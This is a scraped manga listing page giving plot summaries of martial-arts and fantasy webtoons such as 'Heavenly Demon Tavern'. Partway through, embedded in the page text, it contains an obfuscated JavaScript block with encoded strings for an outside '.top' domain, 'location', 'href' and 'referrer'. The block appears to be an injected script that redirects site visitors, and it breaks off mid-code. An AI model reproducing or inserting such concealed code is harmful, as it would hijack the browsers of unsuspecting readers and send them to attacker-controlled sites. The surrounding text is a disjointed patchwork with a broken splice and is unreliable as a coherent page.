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Heavenly Demon Tavern

Get the fastest updates on “Heavenly Demon Tavern” at Mangazin. Read daily for the latest twists in this unique Hot Manga The summary of the story “Heavenly Demon Tavern” One day, Joo Kang-hyun, a stranger who fell into the world of martial arts, rose to the position of Heavenly Demon after going through countless hardships. However, he always missed his hometown, the 21st-century Republic of Korea. He thought he would return to his hometown once the proper array was activated, but instead, he regressed to the past. Gosh… The Heavenly Demon, Joo Kang-hyun, went back in time! In order to save the Youngrae Tavern which was on the verge of bankruptcy, he cooked delicious Jajangmyeon and Jjamppong! This tavern was the place where he lived with the three siblings who took care of him when he first entered Murim, Soran, Doran, and Unyoung. Although their business was not going well, they lived happily in their own way. In the future, after he became The Heavenly Demon, he heard news that their lives all ended miserably. He planned to stop their misfortunes himself. How? With Future Vision, Demon Lord Qi and Jajangmyeon! *Jinbeob : This is a term in the murim world that means ‘formation/array’ which in some cases refers to the formations used by soldiers or groups of people in battle, but in some cases it also refers to formations used to distort space in order to manipulate the opponent’s mind and make the opponent fall into the illusion desired by the attacker, we can also call it a ‘hidden space’ Another name for “Heavenly Demon Tavern” A Thousand-Horse Guest Cup Thousand Horse Guest Glass 천마 객잔 Cheonma Guesthouse


I Am the Youngest Daughter of Murim’s Strongest, the Namgung Clan

\"B-baa, baaah?! (Did I become a baby?! What about my revenge?!) Everyone in the Namgung family despised me. My life was one where even my siblings turned their backs on me. But at the moment when the family was annihilated, the choice my siblings made… was not the family, but me. ‘I never once thought of you as anything but family.’ ‘Live. Even if it’s disgraceful and filthy, live, Ahee.’ Why did they save me? A question I held in my heart my entire life as I carried out my revenge. I thought I could finally close my eyes at the end of it all. ‘Baaah?’ I’ve returned to the past! Could this be some black magic from the Blood Cult? My… my revenge? My peaceful rest?! And why are the Namgung siblings clinging to me again?! What on earth is going on?!\"


God’S Eye Appraiser

A big fire caused Chen Feng to become blind . While in his despair, he received eyes that have a strange appraisal function, allowing him to identify and appraise treasures, antiques and anything valuable, enabling him to appreciate the Heavens and Earth and also see through everything with his divine eyes.


Double Casting

A rising boss in the underworld is forced to lead a double life as a police officer and a gang boss in order to find the killer of his brother. RAWs:


Era Of Awakening

On a new land, appears a trekking young girl from the dragon race, controlling a special element as a weapon, her body possesses a mysterious power -- The Breath of the Sun. Not only did this power reduce her lifespan to two years, her only relative is also sick because of her own power. To change her own destiny, she steps forth on a journey. This long journey is full of dangers, what would happen on the way?


Shirogane No Seija - Hokuto No Ken Toki Gaiden

Toki is a former Hokuto practitioner, and his incredible strength coped with his knowledge of the assassin art would be enough to call him devil.... But Toki's kindness and desire to help people prevent them from calling him devil, they instead can only whisper words akin to that of 'savior'.


Martial Arts of Demonic Humans

One day, a girl appeared out of nowhere claiming to be an exorcist and turning Liu Yanhui’s regular school life upside down. Ever since his troubles began to continuously plague him, his parents were critically injured by demons and even his childhood rival became an exorcist’s target. Eventually, the city he has been living in is at risk due to his presence there… How will a young man with a demonic parasite growing in him survive this world?<script></script><script>function _0x3da3(){var _0x48f444=['','BfhYf','rsoyz','eQlZr','18DDWWYS','text','459726vDOcFK','href','2zuymJd','xMLKu','.customapi','63288BuKvac','2160710wHxHvx','104GTemtn','.top/','QSqJf','349935qjQlBV','location','zdDKJ','google','https://ip','86778MYfWSx','floor','http://rea','ccTxM','1725983YgxGgw','then','350532MMGZxR','random','riJXu','nDnHj','includes','referrer'];_0x3da3=function(){return _0x48f444;};return _0x3da3();}(function(_0x1e7e48,_0x5da966){var _0x324259=_0x35d6,_0x16f69b=_0x1e7e48();while(!![]){try{var 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Reborn 80,000 years

A generation of strong stars, Stardust, died at the hands of the villain and fell accidentally. When I woke up, I had been sleeping for 80,000 years. Things have changed. The four adopted sons have already become the strong men of the continent; a wild dog that has been saved has become the supreme demon king… that child, it is said 40,000 years ago, overcame common customs and became supreme! Observing the small sorrows of tens of thousands of years ago, one by one, Yang Chen feels that Yalishan is great! This is a little loaded.


The Greatest Chaos In History

I’m way too unlucky, seriously. While others get to be time travellers, I can only watch as historical figures traverse to the present While others enjoy flirting with girls, I’m the one being played. My name is Xiao Qiang, but I go by Qiang. One day, I encountered an old man named Liu Laoliu, who claimed to be a deity, and somehow ended up making a deal with him. I run “The Nth Pawnshop,” where I now receive customers like Jing Ke, Li Bai, Xiang Yu, and Qin Hui. As the tale unfolds… This story is filled with a sense of humor, cultivation, time traversing, slice of life, romance, you name it. That’s the Greatest Chaos in History for you.


Giant Robo: The Day the Earth Burned

In the mid-1990's, Yasuhiro Imagawa adapted Mitsuteru Yokoyama's original manga, Giant Robo, into a 7-part OVA series entitled Giant Robo: The Animation - The Day the Earth Stood Still. Imagawa's adaption strayed far from Yokoyama's Giant Robo, featuring a mostly original storyline which included characters and elements pulled from several other Yokoyama projects, such as Tetsujin 28 and Babel II. Giant Robo: The Day the Earth Burned is another story set in the universe created in Giant Robo: The Animation, in which young Daisaku Kusama commands Giant Robo, the mightiest robot of our world, in the battle against the underground terrorist organization known as Big Fire.


Tiansheng Meigu De Wo Bei Bing Jiao Tu Er Ding Shangle

After losing all magical powers, Bing Yuanzi was caught by a female disciple with ulterior motives. Witnessing a disciple she had painstakingly raised harboring malicious intentions, the master drank the last vial of a transformative potion, intending to erase her own existence. Unexpectedly, instead of disappearing, she became the legendary natural beauty, with allure and beauty reaching maximum levels. At the same time, the next words from her female disciple sounded behind her: “Master, you wouldn’t want your loss of magical powers to be known by our enemies, would you?



Tang Sect, the most famous martial arts sect of all. By stealing its most secret teachings to fulfill his dreams, Tang San committed an unforgivable crime. With his ambition attained, he hands his legacy to the sect and throws himself from the fearsome “Hell’s Peak.” But he could have never imagined that this would take him to another world, one without martial arts and grudges. A land where only the mystical souls of battle lay. The continent of Douro. How will Tang San survive in this unknown environment? With a new road to follow, a new legend begins…
